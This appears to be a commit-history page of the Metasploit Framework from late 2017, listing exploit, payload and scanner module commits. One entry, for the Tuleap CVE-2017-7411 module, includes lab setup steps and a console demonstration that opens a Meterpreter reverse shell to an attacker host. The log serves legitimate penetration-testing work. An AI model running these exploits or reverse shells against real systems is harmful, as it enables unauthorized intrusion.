Commit Graph

23360 Commits (d756db4f9dd585ba3e68f641cc7f5875de8dce1e)

Author SHA1 Message Date
Brendan Coles 283b7c5145 Add WS-Discovery Information Discovery module 2017-11-29 12:21:22 +00:00
Tim W 58897bf2fc msftidy 2017-11-29 16:36:50 +08:00
Tim W 7f1f7281f1 add local exploit for osx root login with no password 2017-11-29 16:06:02 +08:00
Austin 676a08b849
Update polycom_hdx_traceroute_exec.rb 2017-11-28 22:01:41 -05:00
Austin 2544b4d8db
Change target name 2017-11-28 21:39:04 -05:00
Austin cb7f173811
Update office_ms17_11882.rb 2017-11-28 21:36:25 -05:00
Zenofex d174ef3a70 Add wd_mycloud_multiupload_upload exploit 2017-11-28 07:12:00 -06:00
bwatters-r7 244acc48b6
Land #9212, pfsense group member exec module 2017-11-27 11:27:29 -06:00
Brent Cook 2c6cfabbc3
Land #8948, allow configuring payload HTTP headers for domain fronting 2017-11-25 10:08:22 -06:00
Brent Cook 8645a518b3 add mettle support for custom headers 2017-11-24 20:27:34 -06:00
vipzen 0d79a3a3e2 Add support to Windows .NET Server 2017-11-23 08:35:55 -02:00
WhiteWinterWolf bfd5c2d330
Keep the initial option name 'ADMIN_ROLE' 2017-11-22 22:03:56 +01:00
Adam Cammack 778e69f929
Land #9229, Randomize slowloris HTTP headers 2017-11-22 14:42:24 -06:00
attackdebris ae43883e2b Fix mongodb_login typo 2017-11-22 08:03:12 -05:00
Austin 960893b99d
change default payload 2017-11-22 06:36:46 -05:00
Yorick Koster a02a02cb0c
Fixed URL... 2017-11-22 11:31:23 +01:00
Yorick Koster d21d3c140e
Fixed date 2017-11-22 11:15:34 +01:00
Yorick Koster 916ee05cce Add exploit module for Clickjacking vulnerability in CSRF error page pfSense 2017-11-22 11:06:22 +01:00
Austin 99555dde02
sleep! per feedback 2017-11-21 21:33:29 -05:00
Jon Hart 5484ee840e
Correct port when eating cisco config 2017-11-21 18:09:51 -08:00
Jon Hart bdc822c67d
Improve logging when requesting config 2017-11-21 18:09:02 -08:00
Jon Hart 5a358db260
Clean up shutdown messaging 2017-11-21 17:55:17 -08:00
Jon Hart 93c424c255
Remove unused 2017-11-21 17:54:31 -08:00
Jon Hart b0d8b0a191
Clean up incoming file handling 2017-11-21 17:54:02 -08:00
Jon Hart 879db5cf38
Land #9050, @mpizala's improvements to the docker_daemon_tcp module 2017-11-21 17:13:24 -08:00
Austin 275f70e77e
better saving 2017-11-21 19:34:04 -05:00
Austin db4c0fcca9
spelling 2017-11-21 19:02:14 -05:00
Matthew Kienow 785e5944d6
Enhanced slowloris HTTP headers and minor cleanup 2017-11-21 18:19:20 -05:00
Matthew Kienow b6c81e6da0
Reimplement slowloris as external module 2017-11-21 16:21:01 -05:00
Daniel Teixeira db2bd22d86
Update slow_loris.rb 2017-11-21 15:49:45 -05:00
Matthew Kienow e07fe77a69
Close sockets to resolve file handle error 2017-11-21 15:49:45 -05:00
Daniel Teixeira 52f56527d8
Update slow_loris.rb 2017-11-21 15:49:45 -05:00
Daniel Teixeira 74becb69e8
Update slow_loris.rb 2017-11-21 15:49:45 -05:00
Daniel Teixeira b7bc68c843
Update slow_loris.rb 2017-11-21 15:49:44 -05:00
Daniel Teixeira 53123d92e2
Update slow_loris.rb 2017-11-21 15:49:44 -05:00
Daniel Teixeira 21a6d0bd6e
Update slow_loris.rb 2017-11-21 15:49:44 -05:00
Daniel Teixeira 60878215e0
Update slow_loris.rb 2017-11-21 15:49:43 -05:00
Daniel Teixeira 9457359b11
Update slow_loris.rb 2017-11-21 15:49:43 -05:00
Daniel Teixeira 29017b8926
Update slow_loris.rb 2017-11-21 15:49:43 -05:00
Daniel Teixeira f79b41edde
Slow Loris 2017-11-21 15:48:11 -05:00
Brent Cook a7932ffe0e fix sizes 2017-11-21 14:31:14 -06:00
Austin fcea6fd8d4
actually create new file ;-; 2017-11-21 15:00:06 -05:00
Brent Cook 4050985649
update payloads 2017-11-21 13:53:33 -06:00
Brent Cook 1fd7f7c8bc prefix MeterpreterUserAgent and PayloadProxy* with Http for consistency,
this also adds aliases where needed
2017-11-21 13:47:19 -06:00
Austin 39a4d193a1
Create office_ms17_11882.rb 2017-11-21 14:47:02 -05:00
h00die dd8238d146 rubocop got a donut 2017-11-20 20:08:28 -05:00
Adam Cammack dd57138423
Make external module read loop more robust
Changes from a "hope we get at most one message at a time" model to
something beginning to resemble a state machine. Also logs error output
and fails the MSF module when the external module fails.
2017-11-20 16:52:05 -06:00
Austin cfd06ab24a
what was i thinking? 2017-11-20 16:08:48 -05:00
Austin b6e2e2aa45
adjust delay 2017-11-19 09:43:18 -05:00
h00die 579d012fa2 spelling 2017-11-19 08:36:27 -05:00
h00die b7f7afb3be version detect, 2.2.6 handling 2017-11-19 08:28:07 -05:00
Austin 1087b8ca16
cleanup 2017-11-18 20:09:29 -05:00
Austin 35567e3e23
Fix - copy system:running-config tftp://ip/file
Copies running config directly to TFTP server, thus removing the need to delete the file :D.
2017-11-18 13:02:12 -05:00
Austin f84f824a71
remove ? 2017-11-17 16:15:18 -05:00
Austin b457c60542
WORK IN PROGRESS - "GET"
Work in progress of GET, and PUT. PUT works fine for grabbing the configuration. GET will be used for service a config to execute commands , or the also WIP action "UPLOAD"
2017-11-17 15:36:27 -05:00
WhiteWinterWolf 2be3433bdb Update references URLs 2017-11-17 13:27:35 +01:00
Austin 8b59c4615b
Update cisco_smart_install.rb 2017-11-17 07:09:41 -05:00
WhiteWinterWolf a636380e4b Merge the new method into drupal_drupageddon.rb 2017-11-17 13:00:15 +01:00
WhiteWinterWolf 704514a420
New exploit method for Drupageddon (CVE-2014-3704)
This new script exploits the same vulnerability as
 *exploits/multi/http/drupal_drupageddon.rb*, but in a more efficient way.
2017-11-16 20:47:44 +01:00
Austin feb24efd27
add DOWNLOAD action
Adds DOWNLOAD function, to download config and send to attacker TFTP server.
2017-11-16 12:58:54 -05:00
Austin 4a8d32af85
Update cisco_smart_install.rb 2017-11-16 12:53:27 -05:00
h00die f8891952c6 pfsense group member exec module 2017-11-15 21:00:58 -05:00
Adam Cammack c740f4369c
Land #9197, Cleanup Mako Server exploit 2017-11-15 15:01:31 -06:00
Adam Cammack 4219959c6d
Bump ranking to Excellent 2017-11-15 15:00:47 -06:00
bwatters-r7 83c228f3b8
Make rubocop less mad 2017-11-15 14:06:36 -06:00
bwatters-r7 33a07beb30
Fix whitespace issues 2017-11-15 12:26:49 -06:00
Austin 829a7a53db
verbose response. 2017-11-15 12:27:40 -05:00
bwatters-r7 53a068d13f Add error handling for failed hashdumps 2017-11-15 11:08:35 -06:00
David Maloney 8b9e091e70 remove humorous typo 2017-11-15 11:08:25 -06:00
David Maloney 7162765b57 load extapi in domain_hashdump
domain hashdump always needs to load extapi to work
2017-11-15 11:08:17 -06:00
David Maloney ad98c9c156 fix Windows server 2016 support for domain_hashdump
The domain hashdump psot module should now work
against Server 2016 DCs.
2017-11-15 11:08:06 -06:00
Austin 4918e5856d
Update polycom_hdx_traceroute_exec.rb 2017-11-15 10:41:51 -05:00
Austin d93120e2ac
Create polycom_hdx_traceroute_exec.rb 2017-11-15 10:40:57 -05:00
Martin Pizala 33e5508bcb
bypass user namespaces 2017-11-15 15:14:58 +01:00
Mehmet İnce 54936b6ac3 Updatig documentation and tweaking initiate_session 2017-11-15 01:04:06 +03:00
Mehmet İnce 86e47589b0 Add xplico remote code execution 2017-11-14 09:30:57 +03:00
0xFFFFFF d28ae361ca
Added exploit module for Samsung SRN-1670D vuln CVE-2017-16524
Please find my exploit module for the vulnerability CVE-2017-16524 I discovered and tested on Web Viewer 1.0.0.193 on SAMSUNG SRN-1670D
2017-11-12 20:11:44 +01:00
William Vu f3e2f4d500
Land #9167, D-Link DIR-850L exploit 2017-11-10 18:15:39 -06:00
William Vu 3936d3baa1 Clean up module 2017-11-10 18:15:22 -06:00
Martin Pizala 971ec80fc1
Keep the python target 2017-11-10 23:11:27 +01:00
Steven Patterson df2b62dc27
Add Mako Server CMD injection Linux support, update docs, move to multi 2017-11-10 16:28:39 -05:00
William Vu ea260e87b7 Remove headers, since we didn't send them before
http was an invalid key for setting headers, and we still got a shell.
These headers also don't seem relevant to the PUT request.
2017-11-09 11:06:50 -06:00
William Vu 7213e6cc49 Fix #9133, makoserver_cmd_exec cleanup 2017-11-09 10:52:03 -06:00
attackdebris 500bde1150 get_vars tweak 2017-11-09 04:16:34 -05:00
h00die 52888871e3
Land #8747 RCE for Geutebrueck GCore on Windows 2017-11-08 20:22:54 -05:00
h00die 7ad151e68b gcore formatting update 2017-11-08 20:21:40 -05:00
attackdebris a04bc0a25b Add get_vars, remove a https instance 2017-11-08 16:30:59 -05:00
Adam Cammack 39916ef61a
Land #9133, Command injection in Mako Server examples 2017-11-08 15:11:01 -06:00
Patrick Webster d95b333ae9 Added exploit module for HP LoadRunner command exec vuln CVE-2010-1549. 2017-11-09 03:59:18 +11:00
William Vu b7c604f941
Land #9189, s/patrick/aushack/g 2017-11-08 10:27:03 -06:00
bwatters-r7 5a07be9b96
Land #9041, Add LPE on Windows using CVE-2017-8464 2017-11-08 10:09:03 -06:00
Patrick Webster 2f6da89674 Change author name to nick. 2017-11-09 03:00:24 +11:00
RootUp 03cd8af29a
Update browser_sop_bypass.rb 2017-11-08 12:50:49 +05:30
RootUp 0c247d5635
Update browser_sop_bypass.rb 2017-11-08 12:38:37 +05:30
Austin 0a4ce1e87b
cmdstager build
Removes the need for HTTP Server, utilizes helper CmdStager, reduces module size.
2017-11-07 19:00:59 -05:00
Maurice Popp 6683ba501f added one missing change 2017-11-07 20:05:43 +01:00
Maurice Popp 8963d77bca multiple changes as requested by h00die 2017-11-07 20:00:56 +01:00
Pearce Barry fc87ee08d9
Land #9060, IBM Lotus Notes DoS (CVE-2017-1130). 2017-11-07 11:20:12 -06:00
attackdebris 7173e7f4b4 Add CVE to module description 2017-11-07 11:05:14 -05:00
RootUp 872894f743
Update browser_sop_bypass.rb 2017-11-07 21:29:16 +05:30
RootUp 2fad61101e
Update browser_sop_bypass.rb 2017-11-07 21:13:06 +05:30
attackdebris 371f3c333a This commit adds the jenkins_xstream_deserialize module 2017-11-07 09:46:42 -05:00
RootUp 3dad025b8c
Create browser_sop_bypass.rb 2017-11-07 14:24:50 +05:30
RootUp 88db98c381
Update ibm_lotus_notes2.rb 2017-11-06 20:45:50 +05:30
Brent Cook cfeb0b7bda prefer threadsafe sleep here 2017-11-06 01:37:09 -06:00
Brent Cook 897b5b5dd1 revert passive handler stance 2017-11-06 01:37:09 -06:00
Pearce Barry 77c13286e0
Ensure closing script tag has necessary escape. 2017-11-05 13:41:29 -06:00
Spencer McIntyre 7d1de9bc48 Fix removing the dropped files after exploitation 2017-11-04 18:50:20 -04:00
Austin 1758ed93d4
Update dlink_850l_unauth_exec.rb 2017-11-04 11:42:49 -04:00
Austin 724c5fb963
finish 2017-11-04 11:41:07 -04:00
Austin e783cb59ea
add "check" & msftidy 2017-11-04 08:53:50 -04:00
Austin 84599ed3fc
Update dlink_850l_unauth_exec.rb 2017-11-04 07:58:13 -04:00
Austin cddec8ca6c
download creds, stores in loot. 2017-11-03 14:24:45 -04:00
Austin 32a75e9782
Update dlink_850l_unauth_exec.rb 2017-11-03 09:02:48 -04:00
Austin 705c1cc6a7
Redo Functions 2017-11-03 08:33:42 -04:00
Austin 8c0da8ea90
Update dlink_850l_unauth_exec.rb 2017-11-03 06:24:07 -04:00
Austin af583e843c
Update dlink_850l_unauth_exec.rb 2017-11-03 06:21:59 -04:00
h00die 697031eb36 mysql UDF now multi 2017-11-03 05:26:05 -04:00
Austin 5b7d803f85
Update dlink_850l_unauth_exec.rb 2017-11-02 15:57:03 -04:00
Austin 429ac71a63
header 2017-11-02 15:53:45 -04:00
Austin 61a67efb82
annnd....it sucks 2017-11-02 15:53:09 -04:00
Spencer McIntyre 70033e2b94 Enable the payload handler by default 2017-11-02 12:31:54 -04:00
William Vu a15b61a218
Fix #9160, exploit method from TcpServer
It already starts the server and waits for us. This is what was called
when the module was still auxiliary.
2017-11-01 19:26:00 -05:00
William Vu 87934b8194 Convert tnftp_savefile from auxiliary to exploit
This has been a long time coming. Fixes #4109.
2017-11-01 17:37:41 -05:00
William Vu 972f9c08eb
Land #9135, peer print for jenkins_enum 2017-11-01 15:33:13 -05:00
William Vu 77181bcc9c Prefer peer over rhost/rport 2017-11-01 15:32:32 -05:00
William Vu 0e66ca1dc0
Fix #3444/#4774, get_json_document over JSON.parse
Forgot to update these when I wrote new modules.
2017-11-01 15:05:49 -05:00
William Vu 7a09dcb408
Fix #9109, HttpServer (TcpServer) backgrounding 2017-11-01 13:35:04 -05:00
William Vu e3ac6b8dc2
Land #9109, wp-mobile-detector upload and execute 2017-11-01 13:25:16 -05:00
William Vu 3847a68494 Clean up module 2017-11-01 13:23:32 -05:00
Jeffrey Martin 7a21cfdfa6
add cached sizes for ppce500v2 2017-11-01 13:08:15 -05:00
EgiX 0973bfb922
Update tuleap_rest_unserialize_exec.rb 2017-11-01 16:37:14 +01:00
EgiX 6985e1b940
Add module for CVE-2017-7411: Tuleap <= 9.6 Second-Order PHP Object Injection
This PR contains a module to exploit [CVE-2017-7411](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7411), a Second-Order PHP Object Injection vulnerability in Tuleap before version 9.7 that might allow authenticated users to execute arbitrary code with the permissions of the webserver. The module has been tested successfully with Tuleap versions 9.6, 8.19, and 8.8 deployed in a Docker container.

## Verification Steps

The quickest way to install an old version of Tuleap is through a Docker container. So install Docker on your system and go through the following steps:

1. Run `docker volume create --name tuleap`
2. Run `docker run -ti -e VIRTUAL_HOST=localhost -p 80:80 -p 443:443 -p 22:22 -v tuleap:/data enalean/tuleap-aio:9.6`
3. Run the following command in order to get the "Site admin password": `docker exec -ti <container_name> cat /data/root/.tuleap_passwd`
4. Go to `https://localhost/account/login.php` and log in as the "admin" user
5. Go to `https://localhost/admin/register_admin.php?page=admin_creation` and create a new user (NOT Restricted User)
6. Open a new browser session and log in as the newly created user
7. From this session go to `https://localhost/project/register.php` and make a new project (let's name it "test")
8. Come back to the admin session, go to `https://localhost/admin/approve-pending.php` and click on "Validate"
9. From the user session you can now browse to `https://localhost/projects/test/` and click on "Trackers" -> "Create a New Tracker"
10. Make a new tracker by choosing e.g. the "Bugs" template, fill all the fields and click on "Create"
11. Click on "Submit new artifact", fill all the fields and click on "Submit"
12. You can now test the MSF module by using the user account created at step n.5 

NOTE: successful exploitation of this vulnerability requires an user account with permissions to submit a new Tracker artifact or access already existing artifacts, which means it might be exploited also by a "Restricted User".

## Demonstration

```
msf > use exploit/unix/webapp/tuleap_rest_unserialize_exec 
msf exploit(tuleap_rest_unserialize_exec) > set RHOST localhost
msf exploit(tuleap_rest_unserialize_exec) > set USERNAME test
msf exploit(tuleap_rest_unserialize_exec) > set PASSWORD p4ssw0rd
msf exploit(tuleap_rest_unserialize_exec) > check 

[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 089d56ffc3888c5bc90220f843f582aa
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[+] localhost:443 The target is vulnerable.

msf exploit(tuleap_rest_unserialize_exec) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(tuleap_rest_unserialize_exec) > ifconfig docker0 | grep "inet:" | awk -F'[: ]+' '{ print $4 }'
msf exploit(tuleap_rest_unserialize_exec) > set LHOST 172.17.0.1
msf exploit(tuleap_rest_unserialize_exec) > exploit 

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 01acd8380d98c587b37ddd75ba8ff6f7
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[*] Sending stage (33721 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:56572) at 2017-11-01 16:07:01 +0100

meterpreter > getuid 
Server username: codendiadm (497)
```
2017-11-01 16:09:14 +01:00
lvarela-r7 c36184697c
Merge pull request #9150 from bcook-r7/runtimeerror
Fix several broken raise RuntimeError calls in error paths
2017-10-31 14:47:42 -05:00
Brent Cook f1e6e7eed5
Land #9107, add MinRID to complement MaxRID 2017-10-31 12:18:28 -05:00
Brent Cook aa0ac57238 use implicit RuntimeError 2017-10-31 04:53:14 -05:00
Brent Cook 9389052f61 fix more broken RuntimeError calls 2017-10-31 04:45:19 -05:00
Brent Cook 56eb828cc5 add e500v2 payloads 2017-10-30 14:04:10 -05:00
Brent Cook 22f9626186
update sizes 2017-10-30 05:26:29 -05:00
RootUp 9c16da9c98
Update ibm_lotus_notes2.rb 2017-10-28 18:53:15 +05:30
Steven Patterson b96fa690a9
Add brackets to print functions 2017-10-27 15:23:22 -04:00
sho-luv 587c9673c6
Added host and port to output
I added the host and port number to reporting when instances are found.
2017-10-27 09:34:49 -07:00
h00die 037c58d1f6 wp-mobile-detector udpates 2017-10-27 10:10:04 -04:00
Steven Patterson 8613852ee8
Add Mako Server v2.5 command injection module/docs 2017-10-26 23:29:11 -04:00
Jeffrey Martin cd755b05d5
update powershell specs for rex-powershell 0.1.77 2017-10-26 15:03:10 -05:00
Jeffrey Martin 43b67fe80b
remove errant bracket, formatting update 2017-10-26 15:01:53 -05:00
Jeffrey Martin f2cba8d920
Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
This restores the original PR
2017-10-25 16:29:11 -05:00
Jeffrey Martin ca28abf2a2 Revert "Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)"
This reverts commit 4999606b61, reversing
changes made to 4274b76473.
2017-10-25 16:19:14 -05:00
Jeffrey Martin 0a858cdaa9
Revert "fix my comments from #8933"
This reverts commit 02a2839577.
2017-10-25 16:13:00 -05:00
Jeffrey Martin 02a2839577 fix my comments from #8933 2017-10-25 14:46:41 -05:00
Jeffrey Martin 4999606b61 Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary) 2017-10-25 12:44:04 -05:00
Jeffrey Martin 4274b76473
Land #9119, Fix #8436, allow session upgrading on meterpreter sessions 2017-10-25 10:26:27 -05:00
RootUp 80aba7264c Update ibm_lotus_notes2.rb 2017-10-25 10:33:25 +05:30
Brent Cook 50c533a452 update cached sizes 2017-10-23 23:04:02 -05:00
mumbai 19859f834d re-add payload 2017-10-23 10:20:19 -04:00
Maurice Popp df14dc4452 autodetection fixing 2017-10-23 09:07:46 +02:00
h00die cd35ae4661
Land #9106 negear dgn1000 unauth rce module 2017-10-22 22:18:53 -04:00
h00die 210f6f80b7 netgear1000dng cleanup 2017-10-22 22:17:40 -04:00
Austin eff94be951 Update netgear_dgn1000_setup_unauth_exec.rb 2017-10-22 16:55:40 -04:00
Austin 6f37bbb1d6 fix EDB 2017-10-22 16:11:19 -04:00
Tim ca4feb5136 fix session upgrading 2017-10-23 01:26:45 +08:00
Austin c7e35f885b add disc date 2017-10-21 20:13:25 -04:00
Austin e0831c1053 hopefully fix header..? 2017-10-21 18:38:32 -04:00
Austin 8239d28323 fix header 2017-10-21 09:07:18 -04:00
h00die cfd7761818 wp_mobile_detector rce 2017-10-20 23:19:58 -04:00
Austin 40e508f2ad correct mistake 2017-10-20 22:26:54 -04:00
Austin ac21567743 Fix requested changes 2017-10-20 22:17:04 -04:00
mumbai 8b8bebd782 remove payload 2017-10-20 20:27:15 -04:00
mumbai b255ddf8d6 New NETGEAR module 2017-10-20 20:25:11 -04:00
Jon Hart 9658776adf
Land #9079, adding @h00die's gopher scanner 2017-10-20 17:16:08 -07:00
mumbai 2f371c9784 Netgear MODULE UNAUTH 2017-10-20 20:15:36 -04:00
mumbai 2e376a1b6a Merge remote-tracking branch 'upstream/master' into netgear_dgn1000_unauth_setup_exec 2017-10-20 20:13:29 -04:00
h00die f250e15b6e
Land #9105 rename psh to polycom for name collision 2017-10-20 20:10:57 -04:00
h00die fd028338e1 move psh to polycom so no more powershell name collision 2017-10-20 20:08:11 -04:00
h00die 5a6da487ab
Land #9043 two exploit modules for unitrends backup 2017-10-20 20:00:35 -04:00
h00die 5abdfe3e59 ueb9 style cleanup 2017-10-20 19:59:24 -04:00
caleBot c26779ef54 fixed msftidy issues 2017-10-20 14:39:39 -06:00
caleBot 8f622a5003 Update ueb9_bpserverd.rb 2017-10-20 14:35:03 -06:00
caleBot cce7bf3e19 Update ueb9_bpserverd.rb 2017-10-20 14:33:46 -06:00
Brent Cook d715f53604 add MinRID to complement MaxRID, allowing continuing or starting from a higher value
from @lvarela-r7
2017-10-20 15:32:25 -05:00
caleBot 85152b5f1e added check function 2017-10-20 14:28:52 -06:00
caleBot e9ad5a7dca Update ueb9_api_storage.rb 2017-10-20 14:05:15 -06:00
caleBot 16b6248943 Update ueb9_bpserverd.rb 2017-10-20 13:58:12 -06:00
caleBot 5c0bcd8f0a Update ueb9_bpserverd.rb 2017-10-20 13:56:25 -06:00
caleBot abc749e1e8 Update ueb9_api_storage.rb 2017-10-20 13:48:29 -06:00
caleBot 8febde8291 Update ueb9_api_storage.rb 2017-10-20 12:23:53 -06:00
Jon Hart 664e774a33
style/rubocop cleanup 2017-10-20 09:44:07 -07:00
Kent Gruber 7cd532c384 Change targetr to target to fix small typo bug on one failure
The target object seems to have a typo where it is referred to as
“targetr” which I’d guess isn’t exactly what we’d like to do in this
case. So, I’ve changed that to “target” in order to work.

So, I’ve simply fixed that small typo.
2017-10-19 19:55:58 -04:00
mumbai 04a24e531b New module 2017-10-18 21:37:26 -04:00
Austin 7098372f58 Update shell_bind_tcp.rb 2017-10-17 19:33:10 -04:00
mumbai 858bb26b56 Adding python/shell_bind_tcp, for an avaialable option 2017-10-17 07:36:45 -04:00
William Vu 7e338fdd8c
Land #9086, proxying fix for nessus_rest_login 2017-10-16 11:52:04 -05:00
William Vu df8261990d
Land #9085, proxying fix for pop3_login 2017-10-16 11:38:24 -05:00
Jeffrey Martin b04f5bdf90
Land #9077, Enhancing the functionality on the nodejs shell_reverse_tcp payload. 2017-10-16 10:49:17 -05:00
Hanno Heinrichs 9597157e26 Make nessus_rest_login scanner proxy-aware again 2017-10-14 11:16:41 +02:00
Hanno Heinrichs f4ae2e6cdc Make pop3_login scanner proxy-aware again 2017-10-14 11:05:54 +02:00
itsmeroy2012 9afc8b589c Updating the payload sizes 2017-10-14 11:05:44 +05:30
Wei Chen c67a5872cd
Land #9055, Add exploit for Sync Breeze HTTP Server
Land #9055
2017-10-13 17:34:03 -05:00
Wei Chen 3a2c6128be Support automatic targeting 2017-10-13 16:53:22 -05:00
h00die a63c947768 gopher proto 2017-10-12 21:32:01 -04:00
Adam Cammack 9b219f42c5
Land #9029, Fix Linux post module file assumptions 2017-10-12 17:56:40 -05:00
Adam Cammack deb2d76678
Land #9058, Add proxies back to smb_login 2017-10-12 17:31:45 -05:00
itsmeroy2012 a0abffb6c4 Adding functionality of StagerRetryWait and StagerRetryCount 2017-10-12 22:25:00 +05:30
itsmeroy2012 374c139d33 Increasing the functionality of the nodejs shell_reverse_tcp payload 2017-10-12 19:05:59 +05:30
bwatters-r7 294230c455
Land #8509, add Winsxs bypass for UAC 2017-10-11 16:24:52 -05:00
Jeffrey Martin cfaa34d2a4
more style cleanup for tomcat_jsp_upload_bypass 2017-10-11 15:53:35 -05:00
Jeffrey Martin 9885dc07f7
updates for style 2017-10-11 15:29:47 -05:00
Jeffrey Martin 1786634906
Land #9059, Tomcat JSP Upload via PUT Bypass 2017-10-11 15:05:00 -05:00
Jeffrey Martin b76c1f3647
remove invalid 'client' object reference in nodejs
fix #9063 by removing invalid object reference introduced in PR #8825
2017-10-11 11:09:28 -05:00
root 03e7797d6c fixed msftidy errors and added documentation 2017-10-11 07:57:01 -04:00
h00die e976a91b15
land #9053 RCE for rend micro imsva 2017-10-10 19:27:06 -04:00
Wei Chen a4bc3ea3c2 Merge branch 'pr9032' into upstream-master
Land #9032, Improve CVE-2017-8464 LNK exploit

Land #9032
2017-10-10 17:11:51 -05:00
William Vu ab63caef7b
Land #9009, Apache Optionsbleed module 2017-10-10 12:13:40 -05:00
Jeffrey Martin 57afc3b939
Land #9044, Address generation issues with pure PSH payloads 2017-10-10 10:40:33 -05:00
RootUp 2b85eb17dd Create ibm_lotus_notes2.rb 2017-10-10 12:22:06 +05:30
Mehmet Ince fb16f1fbda
Disabling bind type payloads 2017-10-10 09:37:24 +03:00
peewpw facc38cde1 set timeout for DELETE request 2017-10-09 21:53:31 -04:00
h00die 850aeda097
land #9052 RCE of Trend Micro OfficeScan 2017-10-09 20:46:30 -04:00
Pearce Barry a3d47ea838
Land #8989, IBM Lotus Notes DoS (CVE-2017-1129) 2017-10-09 19:37:59 -05:00
Pearce Barry fd8b72ca66
Minor tweaks. 2017-10-09 17:02:24 -05:00
Hanno Heinrichs 15adb82b96 Make smb_login scanner proxy-aware again 2017-10-09 23:01:25 +02:00
Mehmet Ince a2d32b460c
Fixing grammer issue 2017-10-09 22:31:13 +03:00
Mehmet Ince c14c93d450
Integrate OfficeScan 11 exploitation and fix grammer issues 2017-10-09 22:11:42 +03:00
jakxx ef282ea154 Sync Breeze HTTP Server v10.0.28 BOF
Added support for v10.0.28 to Sync Breeze BOF module
2017-10-09 13:50:24 -04:00
bwatters-r7 fc5ab96ad6 Merging to prep for testing
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2017-10-09 10:31:30 -05:00
bwatters-r7 7df18e378d Fix conflicts in PR 8509 by mergeing to master 2017-10-09 10:30:21 -05:00
Martin Pizala 6d28a579f3
send_request_cgi instead of send_request_raw 2017-10-09 13:12:48 +02:00
peewpw be8680ba3d Create tomcat_jsp_upload_bypass.rb
Created a module for CVE-2017-12617 which uploads a jsp payload and executes it.
2017-10-08 21:48:47 -04:00
Mehmet Ince 395c82050b
Adding Trend Micro IMSVA Widget RCE 2017-10-08 18:15:32 +03:00
Mehmet Ince 79c9123261
Adding Trend Micro OfficeScan widget rce module 2017-10-08 17:54:18 +03:00
Martin Pizala 33ec3c3d69
Error handling and style 2017-10-08 13:51:16 +02:00
Martin Pizala d8ff99b1f6
Change to ARCH_X64, remove python dependency 2017-10-08 13:51:07 +02:00
h00die 7a87e11767
land #8781 Utilize Rancher Server to exploit hosts 2017-10-07 13:04:34 -04:00
Maurice Popp b7184e87c0 fixing a type 2017-10-07 14:16:01 +02:00
Maurice Popp 8d50c34e4b codefixing 2017-10-07 14:06:58 +02:00
Martin Pizala 34d119be04
Payload space, error handling and style" 2017-10-07 01:12:24 +02:00
William Webb d9e0d891a1
Land #9010, Remove checks for hardcoded SYSTEM account name 2017-10-06 13:42:18 -05:00
h00die 7535fe255f
land #8736 RCE for orientdb 2017-10-06 14:35:42 -04:00
bwatters-r7 f996597bcf update cached payload sizes 2017-10-06 13:19:00 -05:00
caleBot 752d21e11c forgot a comma 2017-10-06 10:47:42 -06:00
caleBot 63e3892392 fixed issues identified by msftidy 2017-10-06 10:16:01 -06:00
caleBot 78e262eabd fixed issues identified by msftidy 2017-10-06 10:15:30 -06:00
caleBot 36610b185b initial commit for UEB9 exploits - CVE-2017-12477, CVE-2017-12478 2017-10-06 09:38:33 -06:00
Maurice Popp 770547269b added documentation, and fixed 4 to 2 indentation 2017-10-06 15:39:25 +02:00
Brent Cook c701a53def
Land #9018, Add Bind Shell JCL Payload for z/OS 2017-10-05 17:24:50 -05:00
Brent Cook 7292ee24a2
Land #9027, Cleanup revshell for zos 2017-10-05 17:20:01 -05:00
Brent Cook 4a745bd2cc
Land #8991, post/windows/manage/persistence_exe: fix service creation 2017-10-05 17:04:58 -05:00
Brent Cook 9d2e8b1e4d
Land #8003, Evasions for delivering nops/shellcode into memory 2017-10-05 16:44:36 -05:00
Brent Cook b7e209a5f3
Land #9033, Geolocate API update 2017-10-05 16:39:09 -05:00
Spencer McIntyre e4d99a14b6 Fix EXITFUNC back to process for the RCE too 2017-10-05 11:38:08 -04:00
Spencer McIntyre 4729c885f1 Cleanup the CVE-2017-8464 LPE module 2017-10-05 11:10:37 -04:00
Spencer McIntyre d0ebfa1950 Change the template technicque to work as an LPE 2017-10-05 10:30:28 -04:00
Spencer McIntyre 825ad940e6 Update the advanced option names and a typo 2017-10-05 10:16:31 -04:00
Spencer McIntyre 482ce005fd Update the advanced option names and a typo 2017-10-05 10:11:00 -04:00
Pearce Barry 7400082fdb
Land #9040, Add CVE and Vendor article URL to the denyall_waf_exec module 2017-10-04 09:12:48 -05:00
Mehmet Ince 110f3c9b4a
Add cve and vendor article to the denyall_waf_exec module 2017-10-04 12:11:58 +03:00
William Vu 10dafdcb12
Fix #9036, broken refs in bypassuac_comhijack
Each ref needs to be an individual array.
2017-10-03 13:36:29 -05:00
ashish gahlot 9ff6efd3a3 Remove broken link 2017-10-02 20:43:55 +05:30
h00die fc66683502 fixes #8928 2017-10-01 19:49:32 -04:00
Martin Pizala e3326e1649
Use send_request_cgi instead of raw 2017-10-01 02:15:43 +02:00
Martin Pizala 701d628a1b
Features for selecting the target 2017-10-01 02:04:10 +02:00
Spencer McIntyre f2f48cbc8f Update the CVE-2017-8464 module 2017-09-30 18:25:16 -04:00
h00die a676f600d6 fixes to more modules 2017-09-30 15:45:52 -04:00
h00die 8a49a639a0 check file exists before reading 2017-09-29 22:34:38 -04:00
h00die 7fc9be846a bcoles suggestions 2017-09-29 20:29:30 -04:00
bigendiansmalls 8af2e5a7ee
Cleanup revshell for zos
remove unused code, extra comments
align code, etc. no functionality changes
2017-09-29 18:27:29 -05:00
bigendiansmalls 9ae8bdda1c
Added Bind Shell JCL Payload for mainframe
